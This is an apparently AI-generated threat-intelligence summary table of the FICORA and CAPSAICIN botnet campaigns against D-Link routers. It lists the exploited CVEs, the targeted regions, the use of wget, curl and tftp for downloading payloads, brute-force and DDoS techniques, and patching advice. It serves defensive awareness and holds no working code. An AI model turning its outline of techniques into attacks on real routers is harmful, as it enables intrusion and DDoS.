| Category | Details |
|---|---|
| Threat Actors | Botnet operators using Mirai variant (FICORA) and Kaiten variant (CAPSAICIN). |
| Campaign Overview | Surge in botnet attacks leveraging D-Link router vulnerabilities; FICORA targeting globally, CAPSAICIN focusing on East Asia (Japan, Taiwan). CAPSAICIN particularly active on Oct 21–22, 2024. |
| Target Regions | FICORA: Global; CAPSAICIN: East Asia (Japan, Taiwan). |
| Methodology | Exploits vulnerabilities in D-Link routers (via HNAP interface), brute-force credential attacks, downloader scripts, and C2 communication for executing commands. |
| Products Targeted | D-Link routers, Linux-based systems. |
| Malware Reference | FICORA (Mirai variant) and CAPSAICIN (Kaiten variant). |
| Tools Used | Commands like wget, ftpget, curl, tftp for downloading payloads; brute-force attack functions; malicious scripts (“multi” and “bins.sh”). |
| Vulnerabilities Exploited | HNAP weaknesses in D-Link routers (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, CVE-2024-33112). |
| TTPs | Exploiting unpatched vulnerabilities, brute-force login attempts, killing rival botnet processes, leveraging DDoS techniques (UDP, TCP, DNS), maintaining persistence, and interaction via C2 servers. |
| Attribution | Botnet campaigns targeting vulnerable D-Link routers and leveraging decade-old vulnerabilities. |
| Recommendations | Regularly update router firmware and kernels, patch known vulnerabilities, use comprehensive monitoring, and implement strict access controls. |
| Source | The Hackers News |
Read full article: https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html
The above summary has been generated by an AI language model
Leave a Reply